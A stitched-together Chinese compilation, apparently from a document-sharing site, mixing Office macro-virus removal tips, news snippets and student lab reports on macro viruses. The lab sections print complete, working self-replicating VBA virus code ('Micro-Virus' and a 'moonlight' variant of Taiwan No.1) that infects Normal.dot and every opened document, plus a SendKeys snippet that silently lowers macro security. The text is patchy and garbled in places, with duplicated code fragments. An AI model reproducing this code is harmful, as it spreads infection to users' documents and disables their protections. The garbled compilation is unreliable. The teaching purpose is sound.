宏病毒分析及清除实验
【免费下载】office 宏病毒处理方法
Office文档是目前使用最多也是最常见的办公文档(它包含Word文档,Excel文档,PPT文档等),以至于Office软件成了大家必备的软件,由于Office软件默认的安全级别为中,所以Office文档成了病毒攻击的目标,目前有许多Office文档病毒,以最近教科局出现的宏病毒为例,成了大家头疼的一件事,现就个人处理方法介绍如下,供大家参考与分享。
1、宏病毒的分析
Office文档中的宏是Office中最高级别的部分,平时大家很少用到,它能把繁重的工作简单化,默认的安全级别为中,宏病毒正是利用这一点通过网络、U盘等进行传播,中毒的电脑明显反应变慢,Office文档大小在不断变化,有的成倍增加,一个小小的电子表格就有2M之多,使用十分困难。
2、中毒后文件的特征
中毒后的Office文档,除大小变大外,每次打开都要求启用宏,不启用便不能打开Office文档,或者打开了,全是空白,如果使用杀毒软件,则会把文档删除,给用户带来许多麻烦。
Office软件运行缓慢,电脑经常死机等。
3、处理方法:
在网上下载“Office病毒专杀”工具(下载地址:http://ww /html/5254.html),解压后安装,界面如下:
点击全盘杀毒,即可对电脑中的Office病毒进行全面查杀。
备注:该软件使用前要关闭其他杀毒软件!。
关于财务部excel宏病毒,非常有效
关于财务部excel宏病毒(XF/Sic.gen)清除方法
请注意财务部门最近传递文件提示有病毒!目前电脑装有杀毒能清除病毒主体,但残余病毒体会重新激活病毒!
具体清除方法如下:
第一步:A、打开文件(如果能打开的话,有些防毒软件会直接杀掉) 选择菜单[插入] ----[名称] ----[定义],如下图:
B、在打开的对话框中,会发现有如下图中所示居多“定义名称”。
此处就是病毒清理不完的根源!将里面内容全部删除。
C、正常情况如下图(若没有进行“定义名称”设定的情况下)
第二步:打开[我的电脑]的如下位置:
C:\Program Files\Microsoft Office\OFFICE11\XLSTART 删除里面的所有内容。
进行完以上步骤后,若excel程序提示其它异常的话,可以关闭程式重新运行即可。
提示:在进行此操作前请先将文件进行备份!。
宏病毒分析实验(新)
---------------------------------------------------------------最新资料推荐------------------------------------------------------宏病毒分析实验(新)宏病毒分析实验一、实验目的及要求:通过本实验的学习,大家应该理解宏病毒的概念、病毒机制、编写方法、传播手段以及预防处理措施。
二、实验基本原理:宏病毒是也是脚本病毒的一种,由于它的特殊性,因此在这里单独算成一类。
宏病毒的前缀是:Macro,第二前缀是:Word、 Word97、 Excel、 Excel97(也许还有别的)其中之一。
凡是只感染 WORD97 及以前版本 WORD 文档的病毒采用 Word97 做为第二前缀,格式是:Macro. Word97;凡是只感染 WORD97 以后版本 WORD 文档的病毒采用 Word 做为第二前缀,格式是:Macro. Word;凡是只感染 EXCEL97 及以前版本 EXCEL 文档的病毒采用 Excel97 做为第二前缀,格式是:Macro. Excel97;凡是只感染 EXCEL97 以后版本 EXCEL 文档的病毒采用 Excel做为第二前缀,格式是:Macro. Excel,依此类推。
该类病毒的公有特性是能感染 OFFICE系列文档,然后通过OFFICE 通用模板进行传播,如:1 / 5著名的美丽莎(Macro. Melissa) 。
一个宏的运行, 特别是有恶意的宏程序的运行, 受宏的安全性的影响是最大的, 如果宏的安全性为高, 那么, 没有签署的宏就不能运行了, 甚至, 还能使部分 Excel 的功能失效.所以, 宏病毒在感染 Excel 之前, 会自行对 Excel 的宏的安全性进行修改,把宏的安全性设为低. Application. SendKeys%TMSs%L{RETURN} 仅修改这个还不行, 很多宏会涉及到 VisualBasic, 所以, 宏的安全性还要信任对于VisualBasic 项目的访问, 所以, 综合安全级别的修改, 就为 Application. SendKeys%TMSs%LT%v{RETURN} 如何判断信任还是不信任对于VisualBasic 项目的访问, 可以用出错捕获进行修改: OnErrorGoToEnd_Sub ‘ 其它功能的程序段ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} 本段程序的功能为: 一旦宏无法正常就进行宏的安全性的修改和对信任对于VisualBasic 项目的访问的修改, 从而这宏病毒的正常运行提供系统支持. 本程序应放在 VBA 中的 ThisWorkbook PrivateSubWorkbook_Open() EndSub 这样一旦打开工作薄就会对其进行有效的修改. 完整的程序为: PrivateSubWorkbook_Open() OnErrorGoToEnd_Sub ‘ 其它功能的程序段 ExitSub End_Sub: Application. SendKeys%TMSs%LT%v{RETURN} EndSub 三、主要仪器设备及实验耗材:PC 电脑一台四、实验内容或步骤:---------------------------------------------------------------最新资料推荐------------------------------------------------------ 1.启动 Word,创建一个新文档。
关于宏病毒的判断、清除和预防
关于宏病毒的判断、清除和预防关于宏病毒的判断、清除和预防2011年01月15日星期六下午01:09关于宏病毒的判断和预防前两天从EXCEL论坛里下载了一个帖子的附件(当然我认为该帖的发表人也不知道文件里有病毒),没想里面有宏病毒"StartUp.xls"在打开文件时提示,缺少"StartUp.xls"。
因为论坛里有很多附件是包含宏的,为了使用时方便,因此我EXCEL中关于宏安全性设置的是"低"。
没想到造成了大错,在此提醒各位一定要将EXCEL中"工具→宏→安全性→安全级"设置为中,打开文件时要确认该文件是否包含宏。
对于宏病毒的判断:当安全级选为中时,如果一旦发现自己的不包含宏的文件打开时提示该文件包含宏,那么恭喜你已经中招了。
此时一定要注意所有打开的文件(指WORD、EXCEL文件)不要存盘,因为宏病毒只有存盘后才会被感染,如果需要将文件进行保存,建议存储为TXT格式,然后从新进行排版。
一定要将打开的文件作好备份再进行杀毒。
我从昨日中午发现机器里被感染病毒,先后使用了"esetsmartsecurity""瑞星天空网站版""360杀毒软件最新版",但前两个软件均没有查出该病毒。
只有360查了出来并将病毒清除。
注意:在杀毒时不要选择"自动处理扫描出的病毒威胁"因为杀毒软件有可能会直接将文件删除,到时重要文件被删掉可是哭都来不及了,当其查出中毒文件后如是重要文件一定要将其重新存储为TXT格式,也可以使用XP自带的"写字板"(注意不是记事本)将word文件直接打开,并将内容保存下来,然后再交给杀毒软件处理。
这样就能保证文件内容不会丢失了。
excel宏病毒是怎么来的随着Internet在中国的迅速拓展,特别是中国教育和科研计算机网(CERNET)以及商业性的ChinaNet和COMNet的发展,电子邮件同样成为许多网络用户使用的工具,互联的校园网络在促进学校科研教育发展的同时,也非常容易成为网络攻击的对象,特别是在网络建设的初期,网络安全意识和网络防范能力都较为薄弱.据透露,一种新的致命病毒---Hare病毒定于近期"发作".Hare病毒届时将显示HDEuthanasia的信息,然后企图重写计算机硬盘上的全部文件.英国《病毒公报》编辑IanWhalley指出,Hare极为复杂,而且很难查出.它是借Internet传播的,未激活版本已在几个国家发现,其中包括美国.另外一种新病毒属于被称为"宏病毒"的传染病毒家族,宏病毒于一年前首次被发现.这种新病毒称为roux,是首例感染Microsoft公司Excell 电子表格的病毒.Laroux的表现很像目前常见的Word.concept病毒,后者在MicrosoftWord生成的文档中传播.Laroux可做为电子表格的附件进入电子邮件,或以其他同电子表格相同的传送方式传播.据美国全国计算机安全协会(NCSA)称,这种病毒相对来说没有什么危害,但可导致少数系统的"应用软件异常".NCSA指出,Laroux看上去比Word.concept传播的速度要慢,因为Excel不像Word使用那么广泛,而且用户不常共用电子表格,而文字处理器文档则经常共用.去年,用户经受的宏病毒猛增了5倍,安全专家把这主要归结为一个因素--电子邮件的迅速增加。
如何发现宏病毒和解决方法
目前的DOS杀毒工具都不能很好的自动杀除宏病毒。
华美星际公司这次推出病毒克星for WORD比较圆满地解决了该问题。
如果说Concept 病毒引出了Word 宏病毒的概念,“台湾1号”便引来了Word 宏病毒的发作,引来了人们对Word 宏病毒的重视。
WORD宏病毒发现及清除:根据宏病毒的传染机制,不难看出宏病毒传染中的特点。
所以发现宏病毒可以通过以下步聚进行:1 在自己使用的WORD中打开工具中的宏菜单,点中通用(Normal)模板,若发现有“AutoOpen”等自动宏,“FileSave”等文件操作宏或一些怪名字的宏,而自己又没有加载特殊模板,这就有可能有病毒了。
因为大多数用户的通用(Normal)模板中是没有宏的。
2 如发现打开一个文档,它未经任何改动,立即就有存盘操作,也有可能是Word带有病毒。
3 打开以DOC为后缀的文件在另存菜单中只能以模板方式存盘而此时通用模板中含有宏,也有可能是Word有病毒。
手工清除宏病毒的方法:1 打开宏菜单,在通用模板中删除您认为是病毒的宏。
2 打开带有病毒宏的文档(模板),然后打开宏菜单,在通用模板和病毒文件名模板中删除您认为是病毒的宏。
3 保存清洁文档。
4 对剩余文件重复步骤1-3。
特别值得注意的是英文版Word模板中的病毒在英文版Word中或更高版本的中文版Word才能被发现并清除,反之中文版有相同规律。
用杀毒工具自动清除宏病毒是理想的解决办法。
方法1 用Word Basic 语言以Word 模板方式编制杀毒工具,在Word 环境中杀毒。
方法2 根据Word BFF格式,在Word环境外解剖病毒文档(模板),去掉病毒宏。
方法1因为在Word 环境中杀毒,所以杀毒准确,兼容性好。
而方法2由于各个版本的Word BFF格式都不完全兼容,每次Word 升级它也必须跟着升级,兼容性不好。
目前有些DOS杀毒软件不是采用Word BFF格式去解剖病毒文档(模板),而是简单化的把病毒文档(模板)中的某些特征串填为了零,病毒宏无法被去除,杀毒后的文件长度与带病毒时的长度相等,这种做法有三个缺点:其一:容易将原文档破坏。
宏病毒分析报告
3.危害严重
4.难以防治
宏病毒的判断方法
虽然不是所有包含宏的文档都包含了宏病毒,但当有下列 情况之一时,您可以百分之百地断定您的OFFICE文档OFFICE 系统中有宏病毒: 1、在打开“宏病毒防护功能”的情况下,当您打开一个您自 己写的文档时,系统会弹出相应的警告框。而您清楚您并 没有在其中使用宏或并不知道宏到底怎么用,那么您可以 完全肯定您的文档已经感染了宏病毒。 2、同样是在打开“宏病毒防护功能”的情况下,您的OFFICE 文档中一系列的文件都在打开时给出宏警告。由于在一般 情况下我们很少使用到宏,所以当您看到成串的文档有宏 警告时,可以肯定这些文档中有宏毒。
目前杀毒软件公司都具备清除宏病毒的能力当然也只能对已知的宏病毒进行检查和清除对于新出现的病毒或病毒的变种则可能不能正常地清除或者将会破坏文件的完整性此时还是手工清理为103应急处理方法
班级:信息05B3 姓名:倪鸿 学号:27
• • • • •
什么是宏病毒? 宏病毒有哪些危害? 感染了该病毒后会出现哪些症状? 用户如何查找、确定感染了这种病毒? 如果确定了该病毒,用户可采取哪些处理 方法?
计算机宏病毒分析及清除试验报告
If ThisDocument = NormalTemplate Then
Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule
End If
With host
If .Lines(1, 1) <> "'Micro-Virus" Then
.DeleteLines 1, .CountOfLines
.InsertLines 1, ourcodemodule.Lines(1, 100)
.ReplaceLine 2, "Sub Document_Close()"
Sub Document_Open()
On Error Resume Next
Application.DisplayStatusBar = False
Options.SaveNormalPrompt = False
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule
实验报告
实验时间
2016年11月23日
实验地点
软件工程实验室
实验名称
计算机宏病毒分析及清除
实验目的:1、了解“宏病毒”机理;
2、掌握清除宏病毒的方法;
3、掌握采用“宏”和脚本语言进行编程的技术。
实验平台:1、Windows 2000/2003/XP或更高级别的Windows操作系统;
2、Office Word 2000/2003等字处理软件。
实验3 宏病毒
XI`AN TECHNOLOGICAL UNIVERSITY 实验报告一.实验目的1.理解WORD宏病毒的感染方式2.理解WORD宏病毒的工作原理3.掌握WORD宏病毒的杀毒方法二.实验原理WORD的文件建立是通过模板来创建的,模板是为了形成最终文档而提供的特殊文档,模板可以包括以下几个元素:菜单、宏、格式(如备忘录)等。
模板是文本、图形和格式编排的蓝图,对于某一类型的所有文档来说,文本、图像和格式编排都是类似的。
WORD提供了几种常见文档类型的模板,如备忘录、报告和商务信件。
你可以直接使用模板来创建新文档,或者加以修改,也可以创建自己的模板。
一般情况下,WORD自动将新文档基于缺省的公用模板NORMAL.DOT。
由此可以看出,模板在建立整个文档中起的作用是作为基类,文档继承模板的属性,包括宏、菜单、格式等。
另外,WORD还提供强大的宏功能。
宏是能组织到一起作为一个独立命令使用的一系列WORD命令,它能使日常工作变得更容易。
在WORD启动时,会自动加载NORMAL.DOT模板,以及它们所包含的宏。
您可以为宏指定特殊的名称,使其变为自动宏,以便在执行某一操作时,如:启动WORD或打开文档,就自动执行具有特殊命名的宏。
同其他宏一样,你可以将自动宏定义在一个共用模板上,也可以将其定义在一个特定模板上。
宏病毒主要寄生在以下3个宏中:AUTOOPEN、AUTONEW、AUTOCLOSE。
带病毒文档打开时,将病毒传染给NORMAL.DOT公用模板中,再由公用模板传染给所有其它正常的文档。
二.MOTHERSDAYVIRUS病毒感染机制MOTHERSDAYVIRUS宏病毒感染WORD文档和NORMAL.DOT文档。
被感染的WORD文档打开时或关闭时会首先弹出一个对话框,对话框关闭后再将控制权转移给正常的WORD文档执行。
MOTHERSDAYVIRUS使用DOCUMENT_OPEN宏(文档打开时执行)感染NORMAL.DOT,使用AUTOCLOSE自动宏感染其它文档。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
实验五宏病毒分析及清除实验姓名:xxx学号:xxxxxxxx日期:2014年4月26日专业:计算机科学与技术一、实验目的⏹了解“宏病毒”机理;⏹掌握清除宏病毒的方法;⏹掌握采用“宏”和脚本语言进行编程的技术。
二、实验环境⏹Windows2003操作系统;⏹Office Word2003字处理软件。
三、实验内容1.软件设置关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。
注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。
2.自我复制功能演示打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。
完整代码如下:'Macro-1:Micro-VirusSub Document_Open()On Error Resume NextApplication.DisplayStatusBar=FalseOptions.SaveNormalPrompt=FalseSet ourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSet host=NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument=NormalTemplate ThenSet host=ActiveDocument.VBProject.VBComponents(1).CodeModule End IfWith hostIf.Lines(1,1)<>"'Micro-Virus"Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine2,"Sub Document_Close()"If ThisDocument=NormalTemplate Then.ReplaceLine2,"Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithMsgBox"MicroVirus by Content Security Lab"End Sub以上代码的基本执行流程如下:1)进行必要的自我保护:Application.DisplayStatusBar=FalseOptions.SaveNormalPrompt=False病毒编写者的自我保护做得非常好,可以使word的一些工具栏失效,例如将工具菜单中的宏选项屏蔽,也可以修改注册表达到很好的隐藏效果。
本例中只是屏蔽状态栏,以免显示宏的运行状态,并且修改公用模板时自动保存,不给用户提示。
2)得到当前文档的代码对象和公用模板的代码对象:Set ourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSet host=NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument=NormalTemplate ThenSet host=ActiveDocument.VBProject.VBComponents(1).CodeModule End If3)检查模板是否已经感染病毒,如果没有,则复制宏病毒代码到模板,并且修改函数名:With HostIf.Lines(1.1)<>"'Micro-Virus"Then.DeleteLines1,.CountOfLines.InsertLines1,Ourcode.ReplaceLine2,"Sub Document_Close()"If ThisDocument=nomaltemplate Then.ReplaceLine2,"Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd With4)执行恶意代码MsgBox"MicroVirus by Content Security Lab"3.具有一定破坏性的宏我们可以对上例中的恶意代码稍加修改,使其具有一定的破坏性(这里以著名宏病毒“台湾一号”的恶意代码部分为基础,为使其在word2003版本中运行,且降低破坏性,对源代码作适当修改,参见如下源代码(Macro_2)。
完整代码如下:'Macro_2:moonlightDim nm(4)Sub Document_Open()'DisableInput1Set ourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModule Set host=NormalTemplate.VBProject.VBComponents(1).CodeModuleIf ThisDocument=NormalTemplate ThenSet host=ActiveDocument.VBProject.VBComponents(1).CodeModule End IfWith hostIf.Lines(1,1)<>"'moonlight"Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine3,"Sub Document_Close()"If ThisDocument=NormalTemplate Then.ReplaceLine3,"Sub Document_Open()"ActiveDocument.SaveAs ActiveDocument.FullNameEnd IfEnd IfEnd WithCount=0If Year(Now())=2013Thentry:On Error GoTo trytest=-1con=1tog$=""i=0While test=-1For i=0To4nm(i)=Int(Rnd()*10)con=con*nm(i)If i=4Thentog$=tog$+Str$(nm(4))+"=?"GoTo begEnd Iftog$=tog$+Str$(nm(i))+"*"Next ibeg:Beepans$=InputBox$("今天是"+Date$+",跟你玩一个心算游戏"+Chr$(13)+"若你答错,只好接受震撼教育......"+Chr$(13)+tog$,"台湾NO.1Macro Virus")If RTrim$(LTrim$(ans$))=LTrim$(Str$(con))ThenDocuments.AddSelection.Paragraphs.Alignment=wdAlignParagraphCenterBeepWith Selection.Font.Name="细明体".Size=16.Bold=1.Underline=1End WithSelection.InsertAfter Text:="何谓宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfter Text:="答案:"Selection.Font.Italic=1Selection.InsertAfter Text:="我就是......"Selection.InsertParagraphAfterSelection.InsertParagraphAfterSelection.Font.Italic=0BeepSelection.InsertAfter Text:="如何预防宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfter Text:="答案:"Selection.Font.Italic=1Selection.InsertAfter Text:="不要看我......"GoTo outElseCount=Count+1For j=1To4BeepDocuments.AddNext jSelection.Paragraphs.Alignment=wdAlignParagraphCenterSelection.InsertAfter Text:="宏病毒"If Count=2Then GoTo outGoTo tryEnd IfWendEnd Ifout:End Sub4.清除宏病毒对每一个受感染的word文档进行如下操作:打开受感染的word文档,进入宏编辑环境(Alt+F11),打开“Normal Microsoft Word”对象“This Document”,清除其中的病毒代码(只要删除所有内容即可)。